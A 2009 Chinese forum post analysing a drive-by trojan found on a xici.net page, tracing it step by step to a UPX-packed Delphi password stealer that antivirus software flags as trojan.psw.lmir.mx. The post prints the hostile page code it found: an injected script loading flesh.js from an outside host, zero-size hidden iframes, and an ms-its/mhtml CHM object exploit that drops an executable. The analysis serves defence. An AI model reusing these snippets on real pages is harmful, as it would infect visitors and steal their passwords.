找回密码
 注册
搜索
热搜: 回贴
  • 前程无忧官网首页 有什么好的平台可以
  • 最新的销售平台 互联网营销的平台有哪
  • 制作网页的基本流程 网页制作和网页设
  • 【帝国CMS】输出带序号的列表(数字排
  • 网站建设公司 三一,中联,极东泵车的
  • 织梦 建站 织梦网站模版后台怎么更改
  • 云服务官网 哪些网站有免费的简历模板
  • 如何建网站要什么条件 建网站要用什么
  • 吉林市移动公司电话 吉林省退休人员网
  • 设计类毕业论文 网站设计与实现毕业论
查看: 7079|回复: 2

木马实例(请勿用在非法用途)

[复制链接]
发表于 2009-11-23 00:20:41 | 显示全部楼层 |阅读模式 IP:江苏扬州
在西祠[url=http://b14973.xici.net/]http://b14973.xici.net上面溜达时发现有人在放毒,条件反射查了一下他的方法

查看网页代码发现有以下插入的脚本
//
<strong><a href='../mail/sendto.asp?id=寂寞小王子'

title='寂寞小王子'>寂寞小王子</a></strong> 发表日期: <strong>2004-10-02

23:14:33</strong></p>
<table width="580" border="0" cellspacing="0" cellpadding="0">
<tr>
<td>...........

<script language="javascript" type="text/javascript">
NH_O_width=10;Rows=15;
</script>



<script language="javascript" src=
"http://filer123.go.zccn.net/flesh.js"; type="text/ javascript">
<\/td><\/tr><\/table>
</script>
</td>
</tr>
</table>

</table><script>if(screen.width<1000)document.write("</table><table border=0 width=100%

align=center><tr><td>");else  document.write("<table border=0 width=760

align=center><tr><td>");</script><hr size=1></p><p><img src='../images/doc0.gif' width=15

height=15>
//
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://filer123.go.zccn.net/flesh.js
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
将此脚本下载后查看代码flesh.js
//

document.write("<iframe src=http://filer123.go.zccn.net/two/cq.htm width=0

height=0></iframe>");

//
直接去下载这个文件

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://filer123.go.zccn.net/two/cq.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

再查看代码cq.htm

//
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>-</title>
</head>

<body>
<div align="center"><img src="http://filer123.go.zccn.net/two/it.jpg";> </div>
<Iframe src="mm.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>
</body>
</html>

//
继续下载上面的文件
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://filer123.go.zccn.net/two/it.jpg
http://filer123.go.zccn.net/two/mm.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

再查看代码mm.htm

//
<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file&://c:\ray.mht!${path}/two.chm::/two.htm"

type="text/x-scriptlet">
</object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexO

f('mm.htm'))));
</script>

//

然后我们去下载two.chm看看
使用quickCHM反编译以下two.chm
出现了图标为记事本two.exe,大小为42.5k
用UltraEdit-32查看发现有UPX字样

我用UPX-GUI版来解压缩
解压后为94.5k

查看了一下是delphi编写的木马

最后用瑞星查一下

是这个木马

trojan.psw.lmir.mx
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|最新主题|手机版|微赢网络技术论坛 ( 苏ICP备08020429号 )

GMT+8, 2024-10-1 03:32 , Processed in 0.207215 second(s), 13 queries , Gzip On, MemCache On.

Powered by Discuz! X3.5

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表